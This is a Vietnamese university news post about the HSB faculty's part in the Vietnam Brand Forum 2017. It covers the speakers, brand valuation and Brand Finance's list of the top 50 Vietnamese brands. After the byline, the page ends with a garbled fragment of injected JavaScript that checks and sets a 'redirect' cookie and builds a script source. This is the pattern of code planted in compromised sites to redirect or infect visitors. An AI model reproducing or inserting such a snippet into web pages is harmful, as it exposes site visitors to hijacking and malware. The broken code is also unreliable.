Khoa Quản trị và Kinh doanh (HSB) vinh dự là đơn vị đồng hành cùng chương trình Diễn đàn Thương hiệu Việt Nam 2017 do Cục xúc tiến thương mại-Bộ Công thương tổ chức.
Sáng 04/12, Diễn đàn Thương hiệu Việt Nam 2017 do Cục xúc tiến thương mại – Bộ Công thương phối hợp với Công ty Định giá hàng đầu thế giới Brand Finance đã được tổ chức tại Hà Nội. Diễn đàn nằm trong khuôn khổ các hoạt động của Chương trình Thương hiệu Quốc gia 2017 nhằm mang đến cái nhìn toàn cảnh về bức tranh thương hiệu Việt Nam hiện nay.
Khoa Quản trị và Kinh doanh (HSB) – ĐHQG HN vinh dự là đơn vị đồng hành cùng chương trình.
Diễn đàn Thương hiệu Việt Nam 2017 có sự tham luận của nhiều diễn giả nổi tiếng là lãnh đạo đại diện các công ty nghiên cứu thị trường, công ty định giá thương hiệu và các doanh nghiệp tiêu biểu trong lĩnh vực thương hiệu như: ông Samir Dixit – Giám đốc Vùng Châu Á Thái Bình Dương, công ty Brand Finance; ông Đặng Xuân Minh – Đồng sáng lập diễn đàn M&A Việt Nam; bà Đặng Thuý Hà – Giám đốc Bộ phận nghiên cứu hành vi Người tiêu dùng – Nielsen Việt Nam khu vực phía Bắc… Trong đó, đến với diễn đàn, ông Lại Tiến Mạnh – Giám đốc Công ty Mibrand đã chia sẻ về BrandBeatScore – bộ mô hình đánh giá hiệu quả truyền thông Thương hiệu thông qua nghiên cứu người tiêu dùng sắp ra mắt tại Việt Nam.
Ngoài ra, diễn đàn cũng dành thời lượng để tham luận về vai trò của hoạt động định giá tài sản thương hiệu cũng như thực trạng về nhu cầu và những thách thức khi tiến hành hoạt động định giá thương hiệu tại Việt Nam. Các diễn giả cũng đi sâu khai thác và giải đáp những thắc mắc về bài toán thương hiệu tại Việt Nam trong bối cảnh hội nhập quốc tế.
Theo đó, thương hiệu được coi là tài sản vô giá của Doanh nghiệp, thậm chí tại nhiều doanh nghiệp, tài sản thương hiệu còn lớn hơn tài sản vật chất. Do vậy, việc định giá giá trị thương hiệu theo tiêu chuẩn tài chính hết sức quan trọng góp phần giảm thiểu cho Nhà nước về thất thoát trong quá trình cổ phần hoá và tránh cho doanh nghiệp thiệt thòi trong quá trình cạnh tranh, nhượng quyền thương mại, mua bán sáp nhập… Có thể xem định giá thương hiệu hiện nay là hoạt động cần thiết, đồng thời là định hướng ưu tiên của mỗi doanh nghiệp.
Tại diễn đàn Thương hiệu Việt Nam 2017, công ty Brand Finance chính thức công bố Bảng xếp hạng Top 50 Thương hiệu giá trị nhất Việt Nam năm 2017 của các thương hiệu dẫn đầu Việt Nam – chứng nhận về thứ hạng, giá trị thương hiệu và chỉ số sức khoẻ thương hiệu tại thị trường trong nước. Trong đó, những cái tên đứng đấu danh sách xếp hạng là Viettel, Vinamilk, VNPT, Vinhomes, Sabeco, Petro Việt Nam, Mobifone, Vinaphone, Vietnam Airlines…
BXH Top 50 Thương hiệu giá trị nhất Việt Nam được coi là duy nhất có phương pháp định giá thương hiệu đáp ứng các tiêu chuẩn ISO (ISO 10668 về tiêu chuẩn định giá).
Dưới đây là một số hình ảnh tại buổi Diễn đàn Thương hiệu Việt Nam 2017:
Nguyên Minh
{var U=(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’‘)}